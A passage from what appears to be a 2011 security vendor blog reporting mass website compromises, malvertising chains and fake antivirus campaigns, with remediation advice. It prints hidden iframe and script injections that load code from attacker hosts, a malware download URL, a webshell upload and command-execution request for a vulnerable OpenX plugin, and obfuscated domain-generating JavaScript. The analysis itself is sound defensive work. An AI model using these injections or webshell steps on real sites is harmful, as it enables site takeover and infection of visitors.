Which gives an HTTP 302 redirect to:

(Link 7:)
http://d1.tentaculos.net/afr.php?ct=1&zoneid=2100&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE

Which generates a <script src> tag, causing the browser to load javascript from:

(Link 8:)
http://indistic.com/media/display/engine/091/impr/j/hd/?gfb=178k1&tprk=837168u&campaignid=142038917

This is the malicious advertiser. The above javascript generates an iframe, causing the browser to load from the exploit domain kokojamba.cz.cc (Link 9-a), and also the creative (the banner ad) itself (Link 9-b) as a .png file. Here's a snippet of this javascript:

The entire javascript code can be found here.

The domain "indistic.com" was registered on Aug 12, 2011 (evidence 1) by "Marcene D. Rohodes (marcenedrhodessm@yahoo.com). The domain currently runs on IP 95.64.46.84 (AS49734) (thank you Jason D.Seimesi), which is located in Romania. The whois records show a US street address but with a Lithuania phone number and a Romanian IP (evidence 2):

=====================================
Administrative Contact:
Name: Marcene D. Rhodes
Organization: no
Address: 4653 Twin House Lane
City: Mount Vernon
Province/state: MO
Country: US
Postal Code: 65712
Phone: +370.956734778
Fax: +370.956734778
=====================================

The domain is using FreeDNS on freedns.afraid.org (evidence 3).

So there were at least three evidences here, that indistic.com wasn't a legitimate advertiser. This malvertisement shouldn't have been let into this chain of AD networks.

Furthermore, as (Jason D.Seimesi pointed out, the same IP is also used by pisofta.com--another domain also registered on Aug 12. Therefore there should be more than one malicious advertiser identify associated with this effort.

(Link 9-a, BlackHole exploit pack:)
http://kokojamba.cz.cc/index.php?tp=2733de342143bbc7

kokojamba.cz.cc is the exploit domain running the BlackHole exploit pack. It is currently running on IP 178.238.36.64, located in Jihomoravský kraj of Czech Republic.

(Link 9-b:)
http://indistic.com/crt/1Npstr/728.PNG

Currently, 7 out of 44 vendors on VirusTotal can detect this malware:

We are in the process of informing all parties involved. If you know more about this incident, please email us at wayne@armorize.com

k985ytv mass compromise ongoing, spreads fake antivirus

2011-08-17T07:33:00.000-07:00

(Credits: Wayne Huang, Chris Hsiao, NightCola Lin)

On August 14, we started to see mass compromise of websites to inject malicious iframes that spread fake antivirus malware. The attack is ongoing, and this is our report.

[Table of Contents]

[1. Summary]
[2. The visitor infection process]
[3. The fake antivirus being spread]
[4. Sample FTP logs of infected websites]
[5. Sample list of infected websites and screenshots of some of them]

[1. Summary]

1. Initial detection date: August 14.
2. Number of infected website: We estimate at least 22,400 unique DOMAINS. The attackers' first attempt was not successful and therefore google indexed more than 536,000 infected pages. However, since then the attackers have fixed the injected pattern and therefore the injected script is executed rather than displayed. Google therefore does not index infected websites any longer.
3. Injected scripts:
Initially (no <script> tag and therefore indexed by Google):

Full text of above is here on pastebin.

Later, it quickly became one of the following (with <script> tag and therefore works)

Full text of above is here on pastebin.

Full text of above is here on pastebin.

4.Browser Exploitation: Drive-by download script served by a modified version of the BlackHole exploit pack.

5. Malware: Fake antivirus, different names in different OS: "XP Security 2012" under Windows XP, "Vista Antivirus 2012" under Windows Vista, and "Win 7 Antivirus 2012" under Windows 7.

6. Injection method: Primarily via stolen FTP credentials, and then use automated program to FTP, retrieve files, inject iframe, and upload back. FTP credentials are stolen from personal Windows computers that have been infected with malware. Malware searches stored password files of FTP clients and also sniffs the FTP traffic. Stolen credentials are sent back to the attackers.

7. Malicious domains and IPs:
Redirectors:
1. hysofufewobe.com (ex: http://hysofufewobe.com/k985ytv.htm)
2. zirycatum.com (ex: http://zirycatum.com/k985ytv.htm)
3. numudozaf.com (ex: http://numudozaf.com/k985ytv.htm)

Above all resolve to the same Moldova (south of Ukraine)IP: 178.17.163.92, registered under the name of "Alexandr S Grebennikov," on July 25.

Exploit servers:
1. jbvnhw.com (ex: http://jbvnhw.com/i87yta.htm)
2. mlvurp.com (ex: http://mlvurp.com/i87yta.htm)
3. rprlpb.com (ex: http://rprlpb.com/i87yta.htm)
4. efnxkg.com (ex: http://efnxkg.com/i87yta.htm)

All resolves to US IP: 69.50.202.74 (AS18866), belonging to Atjeu Website Hosting. All exploit domains were registered under name "Alardo Macias" on August 14.

8. Antivirus detection rate: Currently 5 out of 43 on VirusTotal:

[2. The visitor infection process]

To show how visitors are infected and how we can analyze the infection, we've made the following video:

[3. The fake antivirus being spread]

The Fake AV displays different names in different OS: "XP Security 2012" under Windows XP, "Vista Antivirus 2012" under Windows Vista, and "Win 7 Antivirus 2012" under Windows 7. Below are some screenshots:

[4. Sample FTP logs of infected websites]

204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "LIST /example.com/ftp/" 226 11862
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "TYPE I" 200 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "PASV" 227 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "SIZE index.htm" 213 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "RETR index.htm" 226 12573
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "TYPE I" 200 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "PASV" 227 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "STOR index.htm" 226 13018

[5. Sample list of infected websites and screenshots of some of them]

uwpagina.nl
mydesert.com
paramountcommunication.com
freebloggiveaways.com
sikhsangeet.com
thenewcivilrightsmovement.com
shakeshack.com
greenandcleanmom.org
noor7.us
restorationsos.com
gopusanj.com
amateurmodelsite.com
animationblogspot.com
accessoryworld.net.au
advancedwaterfilters.com
autoventa.com.bo
usgoldbuyers.com
kharidani.biz
nwp4life.com
chicagofree.info
howwazyourweekend.com
marinerslearningsystem.com
articleolive.com
pitchanything.net
toysonics.com
diaperdecisions.com
realtimedesigner.com
group-games.com
coffeebreakwithlizandkate.com
tvtopten.com
la-zen.com
mountainmaids.com
healthlady.com
articleality.com
shophenna.com
lifescircle.info
xmworks.com
articleoncall.com
trainace.com
grupo20.com
tinkfanatic.com
metrokingpc.ca
rapidgiveawayprofits.com
icebreakers.ws
9y3h.com
miamitvchannel.com
beemaster.com
buydropstop.com
freeautoblogger.com
bid4agents.com
interstateplastics.com
b3bootcamp.net
bestbuyuniforms.com
antigravityinc.com
azholisticchamber.com
root-h.org
affiliateplrmarketing.com
justinmichie.com
cyberbullyingreport.com
creativeblogsolutions.com
advancedfanpagesolutions.com
sungrubbies.com
homewiththeboys.net
marsvenus.com
nhwellnesscenters.com
universityfashions.com
bandjob.com
atmananda.com
flyl4l.com
filmyforum.com
iftn.ie
rjharris2012.com
heppellmedia.com
unionsquarecafe.com
vatanfilm.co.cc
statebrief.com
daylabor.org
affnet.com
passingthru.com 906065,775885.net
khojit.com.au
listacquisition.com
vestalwatch.com
printedblindsfactory.com
oauq.org
theoriginalrudebitch.com
quickcash4.us
intraligilaw.ca
ohswekenspeedway.com
autosenbolivia.net
cityclassifiedsads.com
keepingmeposted.com
henckengaines.com
sportsmatchmaker.com
premiereworks.com
ahyasalam.com
sandiegoduilawyer.com
wecravegamestoo.com
vodkasobieski.com
itrmagictricks.com
f1racefactory.com
epoquehotels.us
freakshowvideo.com
write-solution.com
hydrocephaluskids.org
intersectioncapital.com

killzonezero.com
www.en.chosenfewurbano.com
www.generalmoly.com
www.pinnint.com
www.hiphop.org
www.fiftysevendegrees.com
spbaseball.org
www.ohiogisociety.org
www.senjomartialarts.com
www.assignmentproof.com
tulakesbaptist.com
www.generalmoly.com
www.balboaparkdancers.org
sho-ryders.com
www.azholisticchamber.com
www.ajseatery.com
www.thegrangelifestylevillage.com.au
www.north-fayette.com
tilos.com
www.parteen-gaa.com
www.hawaiiancouncil.org
www.levi-catering.com
sbnmarble.com
sayanythingblog.com
cincyshopper.com
www.fiftysevendegrees.com
www.cincygardens.com
www.freeridesurfshop.com
sayanythingblog.com
steve-watt.com
www.thacoshammer.info
www.stevenjackson.net
www.dearborndumpsterrental.com
basementrejects.com
www.hawaiiancouncil.org
www.frostbrothersentertainment.net
www.levi-catering.com
www.chicagodumpsterrental.org
www.center44.com
sbnmarble.com
www.chicagodumpster.org
buysomenow.com
www.noinkonyourfingers.com
www.nashvilledesign.com
photocrystal.biz
www.momsclubofbranchburg.org
www.cardboardrecycling.freedumpsterrental.com
www.atlantadumpster.org
designresumes.com
www.fiftysevendegrees.com
3millionfans.com
lpmndc.org
www.bugfreeservices.com
ibvsct.com

Willysy osCommerce injection: Over 6 million infected pages (update: now over 8 million) and a new video with new tools to do the analysis

2011-08-03T23:10:00.000-07:00

(update: infection numbers are now over 8 million, see original post for updates>

With the number of infected pages now over 6 million, we've again updated our initial report on this willysy mass injection incident. We've also included in it the following new video, in which we used an internal tool to help make the malware analysis process more clear:

Thank you so much for those of you that sent us information--IPs, logs, etc. Sorry we're still analyzing them, but will post new update shortly!

willysy.com mass injection has hit more than 3.8 million pages (update: now > 8 million)

2011-07-31T00:08:00.000-07:00

(update: the infection number is over 6 million now as of Aug 3rd)

On July 24th, we published our initial report on this willysy mass injection incident, which at that time hit around 90,000 pages.

As of July 31th, Google shows more than 3,410,000 (willysy) + 386,000 (exero) = 3.8 million infected pages. Note this number is for individual infected pages, not sites or domains.

And so we've largely updated and reformatted (so new info appears at the front) the initial report, adding to it the infection number, source IP of attack, log entries, osCommerce vulnerabilities used, and more. Please go there and have a look, thanks!

willysy.com Mass Injection ongoing, over 8 million infected pages, targets osCommerce sites

2011-07-25T12:50:00.000-07:00

(Credits: Wayne Huang, Chris Hsiao, NightCola Lin, Sun Huang, Crane Ku)
(Initial post: July 24th)
(Updated: July 30th with new infection number, source IP of attack, log entries, osCommerce vulnerabilities used, and more)
(Updated: Aug 3rd with new video and new infection count: >6 million)
(Updated: Aug 8th with new infection count: >8 million)

[Table of contents]
1. Summary
2. Attack Timeline
3. Source of Attack
4. Vulnerabilities Targeted
5. What Happens to Affected Websites
6. Remediation
7. Infection Details
8. Screenshots

[1. Summary]
1. Number of infections:
As of Aug 3rd, Google shows more than 7,690,000 (willysy) + 629,000 (exero) = 8.3 million infected pages. Note this number is for individual infected pages, not sites or domains.

2. Injected iframe:
initially it was:

<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>

Later it became:

<script src=http://exero.eu/catalog/jquery.js></script>

3. Attacker:
Ukraine IPs: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214 (all AS47694). Agent string: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

4. Target and website vulnerability:
osCommerce sites, using at least the following vulnerabilities: osCommerce Remote Edit Site Info Vulnerability, osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability, and Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass.

5. Browser exploits used:
CVE-2010-0840 -- Java Trust
CVE-2010-0188 –- PDF LibTiff
CVE-2010-0886 -– Java SMB
CVE-2006-0003 -– IE MDAC
CVE-2010-1885 – HCP

6. Exploit domain:
arhyv.ru, counv.ru
Date of registration: July 20th
Registered by: leshkinaira@yahoo.com
IP: 46.16.240.18 (AS51632 Ukrain - Inet Ltd)
Related domains: xlamv.ru, vntum.ru

7. Malware URL:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot

[2. Attack Timeline]

July 10th -- "Angel Injection" write about "osCommerce Remote Edit Site Info Vulnerability" (here, here).

July 11th -- Attacker group starts to test exploitation.

178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com/admin/configuration.php/login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

July 20th -- Attacker registers the exploit domains arhyv.ru and counv.ru, using email: leshkinaira@yahoo.com

July 23rd -- Attack launched injects the "Store Name" variable:

178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

Injected iframes pointed to two domains,
initially:

<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>

and later:

<script src=http://exero.eu/catalog/jquery.js></script>

July 24rd -- Initial writeup of this report, at the time there was only 90,000 infected pages:

July 31th -- Google shows more than 3,410,000 (willysy) + 386,000 (exero) = 3.8 million infected pages.
Bing, on the other hand, shows 1.8 million infected pages for willysy:

Aug 3rd -- Google shows more than 5,820,000 (willysy) + 497,000 (exero) = 6.3 million infected pages

Aug 7th -- Google shows more than 7,690,000 (willysy) + 629,000 (exero) = 8.3 million infected pages.

[3. Source of Attack]

Several IPs have been identified: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214, all of which belong to AS47694. These IPs should be located in Ukraine, and belongs to the ISP www.didan.com.ua.

The attackers used the following agent string:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)

If you have logs or know other IPs that you can share, please send them to Wayne at email: wayne@armorize.com.

[4. Vulnerabilities Targeted]

This attack targets osCommerce websites and leverages several osCommerce vulnerabilities, including osCommerce Remote Edit Site Info Vulnerability, disclosed July 10th, 2011, osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability, disclosed May 14, 2011, and Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass, disclosed May 30, 2010.

Below are some sample log entries:

178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:07 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 21883 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

178.217.165.71 - - [23/Jul/2011:19:55:37 -0500] "GET /admin/configuration.php/login.php?cID=1&action=edit HTTP/1.1" 200 25014 "http://__Masked__by_armorize.com/admin/configuration.php?cID=1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

[5. What Happens to Affected Websites]

1. The "Store Name" variable of osCommerce sites will be modified to inject one of the iframes below:

<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>

<script src=http://exero.eu/catalog/jquery.js></script>

2. For certain websites the attacker also leaves at least one (sometimes more) backdoors, or "webshells". This happens more especially for shared hosting accounts where the backdoor allows for access to multiple accounts on the same server:

[6. Remediation]

Below is our best attempt to describe the remediation procedures. If you have questions or would like us to do it for you please contact wayne@armorize.com.

1. Know if you've been infected.

1.1 Search your logs for:
1.1.1 Access from IPs: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214.
1.1.2 Access with agent string: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)

1.2 Search your site for the existence of two iframes:

<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>

<script src=http://exero.eu/catalog/jquery.js></script>

1.3 Or just have HackAlert find everything for you. We know it's good because we built it ;) (greetings Dave, borrowed your quote)

2. Install an anti-virus program on the computer you use to manage your website.

3. Find and remove the injected backdoors.

4. Find and remove the injected iframes / javascripts

5. Secure your osCommerce installation. Upgrade to the latest version and use .htaccess to protect admin directories.

6. Change your website hosting and your osCommerce admin passwords

A very good article on how to secure osCommerce can be found here (thanks Markus):

http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/

And the latest version of osCommerce can be downloaded here:

http://www.oscommerce.com/solutions/downloads

[7. Infection Details]

Here's the original youtube video we made of the entire infection process; at the time there were only 90,000 infected pages.

And here's the new one we made when there's over 6 million infected pages:

1. Infected website is injected with one of the following scripts:

<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>

<script src=http://exero.eu/catalog/jquery.js></script>

2. Browser loads http://willysy.com/images/banners/, redirected (302) to http://papucky.eu/ext/

3. Contents of papucky.eu/ext/ is here on pastebin, loads javascript from http://gooqlepics.com/include.js?in=864

4. javascript here on pastebin, decodes to this, generates iframe pointing to:

http://yandekapi.com/api?in=864

5. Contents of http://yandekapi.com/api?in=864 is here, redirects to: http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV

6. Contents of http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV is here, decodes to this. This includes multiple browser exploits.

7. After successful exploitation, browser downloads and executes malware from here:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot

[8. Screenshots]

Vulnerable osCommerce installations allows modification of the site's variables without admin access:

The infection attempt, when not successful, has the injected iframe rendered as content (rather than executed) in the title part of the website. Below are some examples:

Vulnerable plugins offered on OpenX.org allowed the "dyndns" group to compromise Websites and spread "Personal Shield Pro" via malvertising

2011-07-08T12:11:00.000-07:00

Vulnerable plugins offered on OpenX.org allowed the "dyndns" group to compromise Websites and spread "Personal Shield Pro" via malvertising

(Credits: Wayne Huang, Chris Hsiao, Sun Huang, NightCola Lin)

Contents:
[1. Summary]
[2. The infection process]
[3. The OpenX Vulnerability]
[4. The attack method]
[5. How to patch a vulnerable site]
[6. The exploit pack]
[7. Domain randomization]
[8. Random PHP filenames--really random?]
[9. The "dyndns" attacker group]
[10. List of affected websites]

[1. Summary]

Impact: Visitors to infected websites are infected permanently with the fake antivirus ransomware "Personal Shield Pro."
Cause: Vulnerability inside a plugin package offered on the official OpenX website openx.org.
Exploit pack: The g01pack exploit pack.
Attack group: Internally we dub it the "dyndns" group, who was responsible for multiple Clicksor incidents that we reported in May, as well as other types of Web malware injection incidents tracing much further back.
Sample list of infected websites:
theastrologer.com
bancadellecase.com
thrillldrillls.com
luckymoving.com
mediabooks.com
dfonline.jp
dailynews.co.za
perefoorum.ee
sasites.co.za
abmotor.pt
medical-tribune.co.jp
diamondcard.it
adrenal-fatigue.de
allergien-behandeln.de
rhr.ru
kuku.ee
handwerkermarkt.de

[2. The infection process]

In 2009, GMO-Cloud and Armorize started the WebAlert malware monitoring platform in Japan. Armorize and GMO have been working together ever since to actively research Web Malware using threats detected via the WebAlert platform. WebAlert is offered free by GMO to 130,000 businesses worldwide resulting in an abundant wealth of malware related information for Armorize and GMO researchers to use in tracking and investigating web malware and large-scale malicious injection outbreaks.

Starting May of this year, we've been tracking a group we tagged internally as the "dyndns." In mid May, we wrote in our Chinese blog about how they've been massively spreading malvertisements via Clicksor. Armorize had its Chinese blog since 2008, and in May we wrote about this group only in the Chinese blog because we didn't really want to publicly call out Clicksor. But the attack was so widespread it was too hard not to talk about it and so we did it in Chinese. We've included in that post full traffic dumps of the incidents; please read it via Google translate if you're interested. We did inform Clicksor, of course.

Well, soon after our post, this "dyndns" group started to attack Websites that use OpenX to serve ads. Visitors to infected websites would end up having the fake antivirus ransomware "Personal Shield Pro," which is permanently installed inside the victims' PCs. This fake antirivus program disables most system functionalities and attributes the reason to "multiple virus infections on the system." One way to stop this and regain control of the PC is to click on "Remove All" and purchase a "license," which then pays the attackers and also discloses to them the credit card number used.

Here's a video using an infected Japanese website as example:

[3. The OpenX Vulnerability]

All of the infected websites were using OpenX to serve advertisements, with some having the installed the latest version--2.8.7. The infected OpenX file is (in most cases) ajs.php, and here's how the entire URL looks like:

http://www.theastrologer.com/openx/www/delivery/ajs.php?zoneid=3&cb=4021406622&charset=utf-8&loc=http%3A//theastrologer.com/

Curious to know how they've been hacked even with a most up-to-date version of OpenX, we dug deeper. As you can see, in the infected website bancadellecase.it, there's a webshell here:

http://bancadellecase.it/admin/banner/www/admin/plugins/videoReport/lib/tmp-upload-images/image.php

A webshell is a backdoor script that allows the attacker full control of the compromised website.

Going up a directory, we found that there's been many attempts to upload a shell:

The first successful upload happened on Jun 29th, and it's obvious that after successfully uploading the webshell, the attacker modified the directory's access rights causing subsequent attempts to fail.

The webshell upload was made possible by a link on the openx.org website for OpenX users to download the OpenX Video Plugin:

This zip file includes OpenX Video Plugin version 1.1, which contains Open Flash Chart, which hasn't been updated since 2009 and contains an unrestricted file upload vulnerability (CVE-2009-4140).

As seen below, downloading and installing the plugin package as offered on openx.org results in installation of OpenX Video Plugin version 1.1:

Version 1.1 isn't patched--the newest, patched version is OpenX Video Plugin 1.8.7, as shown below:

[4. The attack method]

1. The attacker first test for the existence of ofc_upload_image.php: http://victim.com/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php

2. If exists, the attacker then creates a simple webshell using the following request:
http://victim.com/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=

3. The attacker now checks whether the shell has been successfully uploaded:

4. And if so, then the attacker can execute any system command by issuing requests such as: http://victim.com/www/admin/plugins/videoReport/lib/tmp-upload-images/shell.php?cmd=ipconfig

5. Use the shell to inject malicious javascript into one of the OpenX php files. In this case it's for example:

http://www.theastrologer.com/openx/www/delivery/ajs.php?zoneid=3&cb=4021406622&charset=utf-8&loc=http%3A//theastrologer.com/

[5. How to patch a vulnerable site]

Website owners should click on the "Plugins" tab in their control panels (as shown in the above screenshot) and check for the openXVideoAds version. For versions under 1.8.7, the website owner can simply do the following to patch the vulnerability:

1. Locate the directory ofc2, usually under:
/admin/banner/www/admin/plugins/videoReport/lib/ofc2

2. In the directory, open ofc_upload_image.php and empty the contents:
/admin/banner/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php

This is how version 1.8.7 patches the vulnerability

[6. The exploit pack]

This time the "dyndns" grouped mostly used the g01pack exploit pack:

[7. Domain randomization]

Let's have a look at some of the domains of the redirctors involved in this wave of attack:

blogtxcl.dyndns-blog.com
blogtvaj.dyndns-blog.com
blogkmra.dyndns-blog.com
blogrsxg.dyndns-blog.com
blogopud.dyndns-blog.com
bloghinw.dyndns-blog.com
blogcdir.dyndns-blog.com
blogwwbk.dyndns-blog.com
blogrrwf.dyndns-blog.com
blogootc.dyndns-blog.com

And also:

officekhmv.dyndns-office.com
officetnsb.dyndns-office.com
officetlqz.dyndns-office.com
officevfkt.dyndns-office.com
officeluzi.dyndns-office.com
officeeinw.dyndns-office.com
officejmra.dyndns-office.com
officeklqz.dyndns-office.com
officecdir.dyndns-office.com
officexcgp.dyndns-office.com
officeccgp.dyndns-office.com

And so, apparently, these domains take the format of _X_random.dyndns-X.com. In the first case, X=blog and in the second, X=office. Actually, this is exactly how these random domain names are generated. Let's look at the piece of malicious script injected into the OpenX ajs.php file:

http://www.theastrologer.com/openx/www/delivery/ajs.php?zoneid=3&cb=4021406622&charset=utf-8&loc=http%3A//theastrologer.com/

Here's a part of the injected javascript:

function T(harlots, ralphed) {  soberer = harlots;  var r = String("abcdefghi5zI9".substr(0, 9) + "jklmnopqrA2B".substr(0, 9) + "stuvwxyz");  var limpsey = new String("charARvGp".substr(0, 5) + "t");  var doglegs = "length";  footies = new Date();  var leisure = Math.floor(footies.getUTCHours());  var wyverns = footies.getUTCDate();  var dusters = footies.getUTCMonth();  var evinces = footies.getUTCFullYear();  var anchors = (leisure % r[doglegs]);  var a = (leisure + wyverns) % r[doglegs];  var romanos = (leisure + wyverns + dusters) % r[doglegs];  var sorcery = (leisure + wyverns + dusters + evinces) % r[doglegs];  soberer += r[limpsey](anchors);  soberer += r[limpsey](a);  soberer += r[limpsey](romanos);  soberer += r[limpsey](sorcery);  return soberer + ralphed;}

And here's how function T is called:

var soberer = T(new String(\"blou0s\".substr(0,3)+\"glqSm\".substr(0,1)), new String(\".dyndns-\"+\"blog.com\"));

String(\"blou0s\".substr(0,3)+\"glqSm\".substr(0,1)) resolves to:
"blog"
and String(\".dyndns-\"+\"blog.com\") resolves to:
"dyndns-blog.com"

And therefore the above javascript generates the random _X_random.dyndns-X.com malicious redirecting domains (redirectors). The randomization is based on the year, month, date and time.

[8. Random PHP filenames--really random?]

So we've covered the domain name generated by the injected script. Now let's look at the entire generated URL. An example:

http://nwetdsou.dyndns-web.com/images/aeea8469e09d31020332ac926f183eaa.php?thread_id=2&f=131263&topic_id=de_at&

Let's look at the file name part: aeea8469e09d31020332ac926f183eaa.php. Seemingly random, right? Well not really. If you google for it, you get our Chinese blog about Clicksor malvertising (actually, the post is the only result right now).

So actually the seemingly-random "aeea8469e09d31020332ac926f183eaa.php" did appear before, in the malicious URLs involved in the multiple Clicksor malvertising incidents we wrote about. (Google's translation)

Well, further more, in our joint malware research lab with GMO-HS, this "aeea8469e09d31020332ac926f183eaa.php" file has appeared multiple times recently, some in cases associated with websites hacked via this OpenX plugin vulnerability, and some in other cases. An interesting note is that although the domain names are randomized, the file names were left fixed, but made to look random.
Examples:

http://nwetdsou.dyndns-web.com/images/aeea8469e09d31020332ac926f183eaa.php?thread_id=2&f=131263&topic_id=de_at&http://set.gambulingwebsites.com/news/aeea8469e09d31020332ac926f183eaa.php?thread_id=2&f=5090485&topic_id=1994&http://tracks.fresnobabies.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=3336736&forum_id=1992&http://vvvvvv.dyndns-mail.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=3271149&forum_id=1997&http://tracks.fresnobabies.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=2336475&forum_id=1992&http://blog.equine-webdesign.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=2328756&forum_id=2010&http://grand.atlantahomevaluesnow.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=56082781&forum_id=1992&http://payments.cavatars.mobi/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=55210399&forum_id=1991&

[9. The "dyndns" attacker group]

And so, this seemingly-random file name "aeea8469e09d31020332ac926f183eaa.php" file isn't really
random, in fact, it's one of the commonly used file names by this "dyndns" group, and has appeared in various Clicksor malvertising incidents in May, as well as multiple other types of Web malware injections dating much further back.

[10. List of affected websites]
Here's a sample list of affected websites involved in this wave of OpenX hacking to spread "Personal Shield Pro":

theastrologer.com
bancadellecase.com
thrillldrillls.com
luckymoving.com
mediabooks.com
dfonline.jp
dailynews.co.za
perefoorum.ee
sasites.co.za
abmotor.pt
medical-tribune.co.jp
diamondcard.it
adrenal-fatigue.de
allergien-behandeln.de
rhr.ru
kuku.ee
handwerkermarkt.de

Cambodia Government CERT website serving malware

2011-07-07T09:16:00.000-07:00

Beginning of this year, GlobalSign and Armorize established a joint platform to scan for compromised websites serving malware to visitors.

On July 1st (Friday), we noticed that some of the compromised websites had iframes pointing to www.camcert.gov.kh, which is Website of National Cambodia Computer Emergency Response Team (CamCERT) .

We quickly check out CamCERT's website and confirmed that it's been hacked into and injected with CramePack, which is an Web malware (drive-by download) exploit pack that supports exploits for CVE-2006-0003, CVE-2010-0806
, CVE-2009-3867, CVE-2010-0806, CVE-2007-5659, CVE-2009-0927, CVE-2008-2992, and CVE-2009-3269.

The compromised websites contained an injected piece of javascript that generated an iframe pointing to www.camcert.gov.kh:

The iframe generated was:

http://www.camcert.gov.kh/userfiles/.cache/nolock/index.php

Crimepack was injected into the "nolock" directory under http://www.camcert.gov.kh/userfiles/.cache :

And pointing one's browser to http://www.camcert.gov.kh/userfiles/.cache/nolock/control.php and using Crimepack's default username "crimepack" and an empty password logged us into Crimepack's UI, as shown on the first screenshot of this post.

We quickly notified CamCERT, and a few hours later we received an email indicating that they have handled the matter.

Here's GlobalSign's account of this incident.

Mass Meshing Injection: sidename.js (now cssminibar.js) ongoing

2011-06-15T11:45:00.000-07:00

(Credits: Wayne Huang, Chris Hsiao, NightCola Lin)
(Thanks to Christian Frichot and David Taylor for providing additional info)
(Original post: June 15th)
(Updated: Jun 28th)

A quick summary:

	Lizamoon	Sidename.js
Type of attack	Mass SQL Injection	Mass Meshing Injection
Victim criteria	Victims have to be tricked into a) downloading a binary and b) executing the binary, in order to be infected.	Victims visit the website and are infected without their knowledge, no clicking required (drive-by download)
Number of infected sites	Google: 5600 Cisco: 1154 Throughout 7 months	20,000-30,000 About two weeks
Google blacklisting rate	Don't know	20%, made difficult due to mass meshing
Blacklisting	Easy, because most redirectors are maliciously registered, so they can be blacklisted forever	Harder, because redirectors are infected but otherwise legitimate websites, and so they must be removed from blacklisting once cleaned..
